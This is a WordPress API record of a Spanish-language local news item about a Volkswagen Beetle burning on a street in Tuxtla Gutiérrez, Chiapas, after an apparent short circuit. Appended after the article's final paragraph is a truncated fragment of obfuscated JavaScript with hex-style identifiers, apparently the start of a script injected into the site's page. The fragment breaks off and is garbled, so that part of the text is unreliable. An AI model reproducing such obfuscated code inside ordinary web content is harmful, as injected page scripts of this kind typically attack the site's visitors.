{"id":20508,"date":"2025-02-21T05:52:02","date_gmt":"2025-02-21T05:52:02","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=20508"},"modified":"2025-02-21T05:52:03","modified_gmt":"2025-02-21T05:52:03","slug":"se-quema-escarabajo-en-san-pedro","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=20508","title":{"rendered":"Se quema &#8220;escarabajo&#8221; en San Pedro"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"576\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250220-WA0043-1024x576.jpg\" alt=\"\" class=\"wp-image-20509\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250220-WA0043-1024x576.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250220-WA0043-300x169.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250220-WA0043-768x432.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250220-WA0043-1536x864.jpg 1536w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2025\/02\/IMG-20250220-WA0043.jpg 1600w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.<\/p>\n\n\n\n<p>Agencia ReporteCiudano, 20 de febrero del 2025. Tuxtla Guti\u00e9rrez. &#8211; Este jueves por la tarde un Vw sedan se incendi\u00f3 sobre la Avenida Tacan\u00e1 y Calle Cerro del Tigre de San Pedro Progresivo.<\/p>\n\n\n\n<p>El conductor de nombre Guadalupe dio a conocer que iba manejando con normalidad y de manera repentina comenz\u00f3 a salir humo en la parte trasera por un corto circuito.<\/p>\n\n\n\n<p>Afortunadamente el conductor sali\u00f3 y pidi\u00f3 ayuda con los vecinos y trataron de apagar las llamas con cubetas con agua.<\/p>\n\n\n\n<p>Nada pudieron hacer el vochito fue reducido a cenizas.<\/p>\n\n\n\n<p>Llegaron rescatistas para apagar el fuego con equipo especializado.<\/p>\n\n\n\n<p>Finalmente una gr\u00faa remolc\u00f3 el escarabajo a un taller para su reparaci\u00f3n.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho. Agencia ReporteCiudano, 20 de febrero del 2025. Tuxtla Guti\u00e9rrez. &#8211; Este jueves por la tarde un Vw sedan se incendi\u00f3 sobre la Avenida Tacan\u00e1 y Calle Cerro del Tigre de San Pedro Progresivo. El conductor de nombre Guadalupe dio a conocer que iba manejando con normalidad y de manera repentina comenz\u00f3 a salir &hellip;<\/p>\n","protected":false},"author":2,"featured_media":20509,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-20508","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20508","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=20508"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20508\/revisions"}],"predecessor-version":[{"id":20510,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/20508\/revisions\/20510"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/20509"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=20508"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=20508"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=20508"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}